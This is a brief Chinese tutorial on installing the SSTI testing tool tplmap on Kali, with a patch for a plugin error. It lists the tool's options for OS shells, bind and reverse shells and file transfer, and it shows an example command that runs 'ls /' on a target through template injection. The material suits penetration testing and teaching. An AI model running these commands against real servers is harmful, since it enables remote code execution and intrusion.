SSTI漏洞检测工具tplmap的安装与使用

SSTI工具安装与使用，操作环境kali

参考：[https://www.cnblogs.com/ktsm/p/15473100.html]

1、安装python2的pip工具

kali2020版及以上， 输入python2命令会执行python2， python3也存在。
但pip默认是pip3， 而我们需要的是pip2， 所以我们需要先安装pip2

git clone https://github.com/epinna/tplmap

cd tplmap

pip install -r requirements.txt

2、使用git克隆tplmap

进入家目录

#建立目录ins-pip2
cd mkdir ins-pip2

#下载pip2安装脚本
wget  https://bootstrap.pypa.io/pip/2.6/get-pip.py

#python2执行 需要sudo权限
sudo python2 get-pip.py

#升级pip2
sudo pip2 install --upgrade pip 

#安装pip2扩展工具，不然后面安装还是报错
sudo pip2 install --upgrade setuptools 

3、详细指令

--os-shell                          Run shell on the target
--os-cmd                            Execute shell commands
--bind-shell PORT                   Connect to a shell bind to a target port
--reverse-shell HOST PORT   Send a shell back to the attacker's port
--upload LOCAL REMOTE       Upload files to the server
--download REMOTE LOCAL     Download remote files

4、使用

当使用tplmap时，报出

'bool' object has no attribute 'replace'

对此解决方法：

参考：https://github.com/epinna/tplmap/issues/103

从core/checks.py上删除插件阵列的twig条目：

plugins = [
    Smarty,
    Mako,
    Python,
    Tornado,
    Jinja2,
    Freemarker,
    Velocity,
    Slim,
    Erb,
    Pug,
    Nunjucks,
    Dot,
    Dust,
    Marko,
    Javascript,
    Php,
    Ruby,
    Ejs
]

当请求为post方式时，data里面写请求体，后面跟指令。此处查看目录列表。

cd tplmap
python2 tplmap.py -u 'http:example.com' --data 'name=1*' --os-cmd 'ls /'